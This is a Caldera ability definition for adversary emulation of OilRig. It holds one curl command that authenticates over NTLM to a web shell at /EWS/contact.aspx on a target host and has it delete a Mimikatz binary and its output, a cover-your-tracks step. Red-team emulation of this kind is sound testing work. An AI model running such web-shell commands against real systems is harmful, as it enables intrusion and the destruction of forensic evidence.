ability_id: 6482ba12-fa47-409c-bab8-704de6475e38
access: {}
additional_info: {}
buckets:
- defense-evasion
delete_payload: true
description: Clean up by removing the binary and output file
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: curl -s --http1.1 --ntlm -u '#{network.domain.name}\#{initial.target.user}:#{initial.target.password}'
    -k -X POST --data "pro=cmd.exe" --data "cmd=del C:\windows\temp\01.txt C:\windows\temp\m64.exe"
    https://#{second.target.ip}/EWS/contact.aspx
  language: null
  name: sh
  parsers: []
  payloads: []
  platform: linux
  timeout: 60
  uploads: []
  variations: []
name: OilRig Delete Mimikatz and MimiKatz Output (Kali Agent)
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: defense-evasion
technique_id: T1070.004
technique_name: 'Indicator Removal on Host: File Deletion'
